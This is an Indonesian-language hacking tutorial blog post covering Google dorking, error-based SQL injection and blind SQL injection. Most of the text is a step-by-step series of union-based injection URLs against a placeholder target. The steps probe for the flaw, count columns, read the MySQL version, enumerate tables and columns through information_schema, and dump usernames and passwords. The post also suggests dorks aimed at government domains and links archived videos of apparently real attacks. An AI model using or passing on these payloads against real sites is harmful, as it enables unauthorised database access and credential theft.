BANDIT

Hacking Three in one

Halu.. halu .. semuanya … masi ketemu lagi di …. ..

Hacking three in one ?? weleh2 … kek game watch aja … hihiihih…

ok2… maksudna nih kita mo research or apa kek dengan 3 metode:

1. Google hacking
2. SQL Injection (based error)
3. Blind SQL Injection.

1. Google Hacking

Untuk Google hacking sendiri sudah banyak sekali cara atau syntax yang dipakai. Di internet sudah banyak juga yang membahas gimna sie kita mo pake googel untuk aktivitas hacking. Misalnya:

inurl:admin
site:go.id
domain:com

kalo ada yang mo nambahin silahkan …

Video Tutorial bisa diunduh di sini
gogel-hacking.rar

2. SQL INJECTION

Teori:

1. Cek Vulnerability.

a. Letakkan karakter Single Quote pada akhri url address bar.
ie : http://www.target.com/index.php?pageID=1′ <== karakter diletakkan di belakang url address bar.

b. Gunakan Operator Logika.
Anda bisa gunakan operator and,or,dll.
Ex 1 : and 1=1
ie : http://www.target.com/index.php?pageID=1 and 1=1 <== Return True,
artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

Ex 2 : and 1=2
ie : http://www.target.com/index.php?pageID=1 and 1=2 <== Return False,
artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

2. Cek Kolom.

ie :
- http://www.target.com/index.php?pageID=1+order+by+1/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+2/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+3/* <== Return True.
- http://www.target.com/index.php?pageID=1+order+by+4/* <== Return False.

Note : Kita asumsikan bahwa ketika kita memasukkan nilai 4, maka muncul pesan error “Unknown Colomn ‘4′”,
maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2, dan 3.

3. Cek Hole Pada Kolom.
Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament
“UNION ALL SELECT ” atau “UNION SELECT ” ,dll.

ie :
- http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3/*

4. Cek Versi MYSQL.
Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau < v 5.xx tidak sama.
Pada contoh ini saya menggunakan v 5.xx. anda bisa pake @@version atau version() , terserrah mau pake yang mana .. yng penting maknyuss..

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,@@version,3/*

Note : Kita Asumsikan versi dari mysql adalah 5.x.x

5. Cek Tabel dan Kolom.
a. Cek Tabel.
Untuk mengecek tabel gunakan statement berikut :
” information_schema.tables + table_name ”

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables/*

b. Cek Kolom
Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut :
” information_schema.columns … column_name … ”

ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns/*

Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :

ie:
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns+where+table_name=’user’/*

6. Get Value of Colomn.
Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut.
Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.

Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom ‘username’ dan ‘password’.

a. Secara satu per satu.
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3+from+user/*
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,password,3+from+user/*

atau secara bersamaaan

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,group_concat(username,0×3a,password),3+from+user/*

itu mah cuman teoriiiiiiii !!!!! mana realitanya ????????

tenang BOSSS …. (njiplak dikit dr w3hol)

tenang boss… silahkan realita na di sini

bandit-goto-campus.rar

3. Blind SQL Injection

secara inti jalan / cara methode nya sama dengan SQL Injection. Tetapi ada yang beda… nah lo .. apa lagi nih……

Serupa tapi tak sama. Yup.. kira2 begitulah..

Jika didalam SQL injection menampilkan error karena “unknown column” atau error yang lain, tapi didalam teknik Blind SQL Injection halaman yang ditampilkan bisa berupa halaman yang kosong / blank / blind , atau bisa juga berubah menjadi artikel lain (REAL BLIND) , atau bisa juga tidak ada artikel yang ditampilkan, seperti gambar berikut

blind.png

untuk memastikan kembali apakah benar2 ada vulneralbility, kita bisa mengecek jumlah kolom dengan order by, karena bisa saja itu REAL BLIND, dan pasti akan terasa sangat susah . Jika hnya blind saja, cara selanjutnya yg digunakan sama dengan teknik SQL Injection.

utk pratekna bisa dlihat di sini. tapsel.rar

saya kira cukup segini aj …kalo aada kurang lebihnya saya mohon maap ^^

just learn… diatas langit masi ada langit …..

cmiiw

**sori gak sempet nyensor… me bukan anggota KPI sie … ;p

thx to:

- Stuff, Crew and members of virologi.info
- Stuff, Crew and members of echo.or.id
- witecloner dkk .. love u guyss… muachhh

reference:

1. echo.or.id (byk sekali tutorna disini)
2. Marezzi paper